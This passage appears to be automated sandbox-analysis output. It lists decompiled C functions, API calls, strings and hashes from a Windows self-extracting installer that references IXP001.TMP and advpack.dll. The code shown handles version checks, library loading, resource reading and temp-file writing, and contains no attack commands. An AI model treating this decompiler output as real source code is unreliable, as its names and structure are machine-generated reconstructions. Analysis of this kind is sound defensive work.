						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E010644B9(0, _t138);
					L66:
					return E01066CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x010636f9
0x01063700
0x0106370c
0x01063716
0x01063718
0x0106371b
0x01063721
0x0106372b
0x0106373d
0x01063745
0x01063746
0x01063746
0x01063749
0x010637ab
0x010637ad
0x010637ae
0x010637b3
0x010637b8
0x010637b8
0x010637bf
0x010637bf
0x010637c5
0x00000000
0x00000000
0x010637cb
0x010637cd
0x00000000
0x00000000
0x010637d5
0x010637db
0x010637e8
0x010637ea
0x010637ea
0x010637ea
0x010637f0
0x010637f6
0x01063805
0x01063817
0x0106382b
0x01063830
0x01063836
0x0106383b
0x0106383d
0x010638eb
0x010638eb
0x010638f2
0x0106390c
0x01063911
0x01063911
0x01063913
0x0106394d
0x0106394d
0x0106394f
0x010638a9
0x010638a9
0x010638b0
0x010638b2
0x010638b9
0x010638bb
0x010638c1
0x01063975
0x010638c7
0x010638de
0x010638e0
0x010638e0
0x0106397b
0x0106397d
0x010639a9
0x0106397f
0x01063982
0x0106398b
0x0106398d
0x0106398f
0x0106399f
0x010639a1
0x01063991
0x01063991
0x01063991
0x0106398f
0x010639af
0x010639b6
0x01063a0f
0x01063a0f
0x01063a11
0x01063a13
0x01063a19
0x00000000
0x010639b8
0x010639b8
0x010639ba
0x00000000
0x00000000
0x010639bc
0x010639bf
0x00000000
0x00000000
0x010639c3
0x010639c9
0x010639ce
0x010639d0
0x010639e3
0x010639e5
0x010639e6
0x010639f1
0x010639f7
0x010639fa
0x01063a01
0x01063a04
0x00000000
0x00000000
0x01063a06
0x01063a09
0x01063a09
0x01063a0b
0x01063a0b
0x00000000
0x01063a09
0x010639fc
0x00000000
0x010639fc
0x010639d3
0x010639d8
0x010639da
0x00000000
0x00000000
0x00000000
0x010639dc
0x010639b6
0x01063955
0x0106395b
0x00000000
0x00000000
0x01063961
0x01063963
0x00000000
0x00000000
0x01063969
0x01063969
0x00000000
0x01063969
0x01063915
0x01063915
0x0106391b
0x0106391f
0x00000000
0x00000000
0x0106392d
0x01063933
0x01063938
0x0106393a
0x00000000
0x00000000
0x01063940
0x01063946
0x0106394b
0x00000000
0x0106394b
0x00000000
0x010638f2
0x01063843
0x01063845
0x00000000
0x00000000
0x0106384b
0x0106384d
0x01063883
0x01063885
0x00000000
0x00000000
0x0106389a
0x0106389e
0x0106389e
0x00000000
0x00000000
0x010638a0
0x010638a0
0x010638a2
0x00000000
0x00000000
0x010638a4
0x00000000
0x010638a4
0x0106384f
0x01063851
0x01063857
0x0106386e
0x01063877
0x0106387b
0x00000000
0x00000000
0x00000000
0x01063881
0x01063859
0x0106385c
0x01063862
0x01063866
0x00000000
0x00000000
0x01063868
0x00000000
0x010638f4
0x010638f4
0x010638f5
0x010638fb
0x01063901
0x01063901
0x00000000
0x0106390a
0x0106374b
0x0106374e
0x0106375c
0x01063764
0x01063769
0x0106376e
0x01063771
0x0106379c
0x0106379f
0x00000000
0x00000000
0x010637a3
0x010637a4
0x00000000
0x010637a4
0x01063773
0x01063777
0x01063778
0x0106377f
0x01063781
0x0106378e
0x0106378e
0x01063794
0x00000000
0x01063794
0x01063783
0x00000000
0x00000000
0x01063785
0x0106378c
0x00000000
0x00000000
0x00000000
0x0106378c
0x01063750
0x00000000
0x0106372d
0x0106372d
0x0106396b
0x0106396b
0x0106396c
0x0106396e
0x0106396f
0x01063a1e
0x01063a1e
0x01063a22
0x01063a27
0x01063a3e
0x01063a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 01063723
MessageBeep.USER32(00000000), ref: 010639C3
MessageBoxA.USER32(00000000,00000000,lega,00000030), ref: 010639F1

Strings

3, xrefs: 01063785
lega, xrefs: 010639E9, 01063A19

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$lega
API String ID: 2519184315-680046778
Opcode ID: 131a2c8db750c9aa029969bf903e02e59419d71d51f32967926a6b8c22df75d6
Instruction ID: b70b56515d3efbbe93c085da11a34282b7a953e436b42be6d6d47582fcc5a77b
Opcode Fuzzy Hash: 131a2c8db750c9aa029969bf903e02e59419d71d51f32967926a6b8c22df75d6
Instruction Fuzzy Hash: E791B171E012259FEBB58A29C9807EEB7F8BB85304F0540EAD9CD9F255D7358A80CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01066495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E01066495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x1068004; // 0x19e58fb5
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E01061781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
				_t26 = "advpack.dll";
				E0106658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E01066CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x01066495
0x01066495
0x010664a0
0x010664a7
0x010664ab
0x010664bd
0x010664c2
0x010664d3
0x010664df
0x010664e8
0x01066502
0x010664ee
0x010664f9
0x010664f9
0x01066516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010664DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010664F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 01066502

Strings

advpack.dll, xrefs: 010664C2, 010664CD, 01066501
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010664AC

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
API String ID: 438848745-1655358546
Opcode ID: b456f23e7129ede87923dc07553795cbefcbc13e7128328ef8525ca3f9130b84
Instruction ID: 73a4af8443c9fdb9404ae33fdcc37281fac6b94bf48c7a47afe344717e7f3e31
Opcode Fuzzy Hash: b456f23e7129ede87923dc07553795cbefcbc13e7128328ef8525ca3f9130b84
Instruction Fuzzy Hash: AF01D130A04108EBEB60EB64DC49AEE777CEBA0314F500199F5C5A71C4DF76AA868B51

Uniqueness

Uniqueness Score: -1.00%

Function 010628E8 Relevance: 7.6, APIs: 5, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010628E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E01062773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E01062A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E01062A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x010628f1
0x010628f4
0x010628f7
0x010628f9
0x010628fc
0x010628ff
0x01062901
0x01062907
0x01062a62
0x01062a64
0x0106290d
0x0106290d
0x0106290f
0x01062912
0x01062920
0x01062937
0x00000000
0x00000000
0x01062944
0x0106294a
0x0106294f
0x01062a2f
0x01062a32
0x01062a34
0x01062a37
0x01062a41
0x00000000
0x00000000
0x01062955
0x0106295e
0x01062962
0x01062969
0x0106296f
0x01062974
0x0106298c
0x01062a20
0x01062a21
0x01062a27
0x01062a4c
0x01062a4f
0x01062a50
0x01062a53
0x01062a56
0x01062a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x010629b2
0x010629b2
0x010629b5
0x010629bd
0x010629c3
0x010629cc
0x010629d5
0x010629d7
0x010629da
0x010629dd
0x010629df
0x010629ec
0x010629f8
0x010629fc
0x010629ff
0x01062a02
0x01062a07
0x01062a0a
0x01062a0f
0x01062a19
0x01062a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01062a0f
0x0106298c
0x01062974
0x01062962
0x00000000
0x0106294f
0x01062912
0x01062a65
0x01062a68
0x01062a6c
0x01062a6f
0x01062a6f
0x01062a7d

APIs

GlobalFree.KERNEL32 ref: 01062A6F

Part of subcall function 01062773: CharUpperA.USER32(19E58FB5,00000000,00000000,00000000), ref: 010627A8
Part of subcall function 01062773: CharNextA.USER32(0000054D), ref: 010627B5
Part of subcall function 01062773: CharNextA.USER32(00000000), ref: 010627BC
Part of subcall function 01062773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01062829
Part of subcall function 01062773: RegQueryValueExA.ADVAPI32(?,01061140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01062852
Part of subcall function 01062773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01062870
Part of subcall function 01062773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010628A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,01063938,?,?,?,?,-00000005), ref: 01062958
GlobalLock.KERNEL32 ref: 01062969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,01063938,?,?,?,?,-00000005,?), ref: 01062A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 01062A81

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID:
API String ID: 3949799724-0
Opcode ID: d75e270ed2e3d7dd24de47e0adee301810f937145228bc79f33743031e6f796f
Instruction ID: f4b27bd3859079ec9d2250f6945125c30cade756ae25cbec015a384936ca7e2e
Opcode Fuzzy Hash: d75e270ed2e3d7dd24de47e0adee301810f937145228bc79f33743031e6f796f
Instruction Fuzzy Hash: AB512B71E0021ADFDB21DF98C884AAEFBF9FF48700F14416AE985E3211D7759A41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01064169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E01064169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0106468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0106468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E010644B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E010644B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x0106417d
0x0106418f
0x01064193
0x010641b7
0x010641d3
0x010641e6
0x00000000
0x010641e7
0x010641d5
0x010641d6
0x010641d8
0x010641d9
0x010641da
0x010641df
0x010641e1
0x00000000
0x010641e1
0x010641b9
0x010641ba
0x010641bc
0x010641bd
0x010641be
0x00000000
0x010641be
0x00000000

APIs

Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
Part of subcall function 0106468F: SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
Part of subcall function 0106468F: LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
Part of subcall function 0106468F: LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
Part of subcall function 0106468F: memcpy_s.MSVCRT ref: 010646E5
Part of subcall function 0106468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010630B4), ref: 01064189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010630B4), ref: 010641E7

Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554

Strings

FINISHMSG, xrefs: 01064173, 010641AB
<None>, xrefs: 010641C5

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: ac2c98cce3cb795d92de3026894e22f7944d6ba860e976e74d3e7893993c5270
Instruction ID: b57c389df85d94bcf65d2882288fcb7254cd61d27ba43abd9e0fdce7b21b577d
Opcode Fuzzy Hash: ac2c98cce3cb795d92de3026894e22f7944d6ba860e976e74d3e7893993c5270
Instruction Fuzzy Hash: 870181F5740225FFF32526698C85FBB658EDBE8695F004025B786EA184DE69CC0141B5

Uniqueness

Uniqueness Score: -1.00%

Function 01067155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01067155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x1068004; // 0x19e58fb5
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x1068004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x1068004 = _t39;
				}
				_t37 =  !_t36;
				 *0x1068008 = _t37;
				return _t37;
			}

0x0106715d
0x01067161
0x01067165
0x01067178
0x01067182
0x0106718e
0x01067197
0x010671a0
0x010671b1
0x010671b8
0x010671c4
0x010671c7
0x010671cb
0x010671d5
0x010671da
0x010671da
0x010671dc
0x010671dc
0x010671e2
0x010671e5
0x010671ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01067182
GetCurrentProcessId.KERNEL32 ref: 01067191
GetCurrentThreadId.KERNEL32 ref: 0106719A
GetTickCount.KERNEL32 ref: 010671A3
QueryPerformanceCounter.KERNEL32(?), ref: 010671B8

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: c2ce4e958a48344bcecfc89351136f610794b2ce117c3521d3c2c7ee8b249044
Instruction ID: 3fced7b2923822a4fc4ff41582af4b55e34316b012b9301adcad4abd9a346c92
Opcode Fuzzy Hash: c2ce4e958a48344bcecfc89351136f610794b2ce117c3521d3c2c7ee8b249044
Instruction Fuzzy Hash: E8115171E01208EFDF60DFB8D64869EB7F5FF08314F514896E841EB214D7359A008B40

Uniqueness

Uniqueness Score: -1.00%

Function 010619E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E010619E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x1068004; // 0x19e58fb5
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E010643D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x1069a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E01066CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x010619e0
0x010619e0
0x010619eb
0x010619f2
0x010619f9
0x010619fc
0x01061a01
0x01061a2a
0x01061a2e
0x01061a3e
0x01061a4f
0x01061a62
0x01061a6a
0x00000000
0x01061a03
0x01061a06
0x01061a20
0x01061a20
0x01061a08
0x01061a08
0x01061a14
0x00000000
0x01061a16
0x01061a18
0x01061a70
0x01061a72
0x01061a72
0x01061a14
0x01061a06
0x01061a81

APIs

EndDialog.USER32(?,?), ref: 01061A18
GetDesktopWindow.USER32 ref: 01061A24
LoadStringA.USER32(?,?,00000200), ref: 01061A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 01061A62
MessageBeep.USER32(000000FF), ref: 01061A6A

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: ffcf53d03600d93c56c44416b14272d29e106a011e3600a62603a12360671e2d
Instruction ID: f57463b00b53059c0fff4467642f764b2cf373c963f64652f9e195d63f6e5abf
Opcode Fuzzy Hash: ffcf53d03600d93c56c44416b14272d29e106a011e3600a62603a12360671e2d
Instruction Fuzzy Hash: E1116131600119EFDB60EF68D908AAE77F8FF49350F008195E996E7194DA36AE01CB95

Uniqueness

Uniqueness Score: -1.00%

Function 010663C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E010663C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x1068004; // 0x19e58fb5
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E01061781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
				E0106658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x1069124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x1069124 = 0x80070052;
					_t37 = 0;
				}
				return E01066CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x010663cb
0x010663d2
0x010663d8
0x010663ea
0x010663f3
0x01066401
0x01066402
0x01066410
0x01066415
0x01066433
0x01066438
0x01066449
0x01066463
0x0106646d
0x01066477
0x01066477
0x0106647a
0x0106643a
0x0106643a
0x01066444
0x01066444
0x01066492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0106642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0106645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0106647A

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010663EB

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 1065093856-2356899610
Opcode ID: 909283ec753156e7ea196f9ce0d3682de2eb748510a32ba5b0f955beaa895749
Instruction ID: b4d5a4cc4a752be6b6c4ba91beb4a7cd91063214a0a780e407d50192d8c22353
Opcode Fuzzy Hash: 909283ec753156e7ea196f9ce0d3682de2eb748510a32ba5b0f955beaa895749
Instruction Fuzzy Hash: 6421C071A00218AFDB20DF25DC85FEA77BCEB55314F1041A9E5C5A7280DAB66E848FA4

Uniqueness

Uniqueness Score: -1.00%

Function 010647E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010647E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E01061680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x10691e0; // 0xf37c00
						 *(_t34 + 4) = _t11;
						 *0x10691e0 = _t34;
						return 1;
					}
					_t25 =  *0x1068584; // 0x0
